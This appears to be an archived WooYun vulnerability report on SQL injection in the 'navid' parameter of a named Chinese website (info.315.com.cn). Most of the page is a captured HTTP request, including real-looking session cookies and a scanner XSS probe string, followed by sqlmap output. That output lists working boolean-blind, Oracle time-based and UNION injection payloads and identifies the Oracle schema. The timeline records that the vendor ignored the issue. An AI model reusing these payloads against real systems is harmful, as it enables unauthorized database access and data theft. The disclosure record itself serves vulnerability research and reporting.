乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-11: 细节已通知厂商并且等待厂商处理中 2015-11-24: 厂商已经主动忽略漏洞,细节向公众公开
POST /sltindexlist HTTP/1.1Content-Length: 199Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://info.315.com.cn:80/Cookie: JSESSIONID=KLnwWCgS71CzpnPSrcKYqGWvJnYpXhcBR43BKvzh93LKBsBxJJg1!-1246551652; safedog-flow-item=361BDCAB1A0F818D19E4E553A3D75F76; 53gid0=84155521315; 53gid1=84155521315; 53gid2=84155521315; visitor_type=new; 53uvid=1; 53kf_72106741_keyword=http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink(0%2C%22'%5C%22%3E%3Cxsstag%3E()refdxss%22); kf_72106741_keyword_ok=1; onliner_zdfq72106741=0; WT_FPC=id=2c999390baf9e943b4d1447223336720:lv=1447223336720:ss=1447223336720; guest_id=84155521315; customer_service_language=cn; unique_ip_72106741=111.202.249.47; unique_ip_revisit72106741=1447223374; SESSION_COOKIE=www15_1; CNZZDATA1831326=cnzz_eid%3D503006059-1447223259-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1447223259Host: info.315.com.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*classid=005014006001001&endtime=%bd%e1%ca%f8%ca%b1%bc%e4&navid=69*&startime=%bf%aa%ca%bc%ca%b1%bc%e4&submit1=%b2%e9%d1%af&title=%c7%eb%ca%e4%c8%eb%b9%d8%bc%fc%d7%d6
参数:navid
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: classid=005014006001001&endtime=%bd%e1%ca%f8%ca%b1%bc%e4&navid=69 AND 3171=3171&startime=%bf%aa%ca%bc%ca%b1%bc%e4&submit1=%b2%e9%d1%af&title=%c7%eb%ca%e4%c8%eb%b9%d8%bc%fc%d7%d6 Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: classid=005014006001001&endtime=%bd%e1%ca%f8%ca%b1%bc%e4&navid=69 AND 4515=DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(100)||CHR(99)||CHR(122),5)&startime=%bf%aa%ca%bc%ca%b1%bc%e4&submit1=%b2%e9%d1%af&title=%c7%eb%ca%e4%c8%eb%b9%d8%bc%fc%d7%d6 Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: classid=005014006001001&endtime=%bd%e1%ca%f8%ca%b1%bc%e4&navid=-6665 UNION ALL SELECT NULL,CHR(113)||CHR(98)||CHR(98)||CHR(120)||CHR(113)||CHR(80)||CHR(69)||CHR(110)||CHR(76)||CHR(71)||CHR(106)||CHR(68)||CHR(78)||CHR(107)||CHR(68)||CHR(113)||CHR(98)||CHR(112)||CHR(122)||CHR(113),NULL,NULL,NULL,NULL FROM DUAL-- &startime=%bf%aa%ca%bc%ca%b1%bc%e4&submit1=%b2%e9%d1%af&title=%c7%eb%ca%e4%c8%eb%b9%d8%bc%fc%d7%d6---web application technology: Servlet 2.4, JSP 2.0back-end DBMS: Oraclecurrent schema (equivalent to database on Oracle): 'DB315WEB'
参数过滤
危害等级:无影响厂商忽略
忽略时间:2015-11-24 14:18
漏洞Rank:4 (WooYun评价)
暂无